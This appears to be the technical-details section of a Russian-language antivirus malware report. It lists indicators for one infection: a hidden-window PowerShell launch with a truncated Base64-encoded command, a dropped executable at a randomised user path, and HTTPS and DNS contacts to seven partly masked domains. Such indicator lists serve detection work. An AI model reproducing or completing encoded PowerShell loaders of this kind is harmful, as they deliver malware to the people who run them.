Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAkAFYASgBaAFQANQAgACAAPQAgAFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBmACAAJwBzAFQAJwAsACcAdABvAHIAeQAnACwAJwBFAG0ALgBJAE8ALgBEAEkAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1193579.cvr
- %HOMEPATH%\u8gj5tn\ffgz3a1\c9t5hxz.exe
- %HOMEPATH%\u8gj5tn\ffgz3a1\c9t5hxz.exe
- 'iv###eme.com':443
- 'se##ado.com':443
- 'pa####npastry.com':443
- 'ca###yann.com':443
- 'cr####reviver.org':443
- 'lo###tician.org':443
- 'm-##sh.com':443
- DNS ASK iv###eme.com
- DNS ASK se##ado.com
- DNS ASK pa####npastry.com
- DNS ASK ca###yann.com
- DNS ASK cr####reviver.org
- DNS ASK lo###tician.org
- DNS ASK m-##sh.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAkAFYASgBaAFQANQAgACAAPQAgAFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBmACAAJwBzAFQAJwAsACcAdABvAHIAeQAnACwAJwBFAG0ALgBJAE8ALgBEAEkAJw...' (со скрытым окном)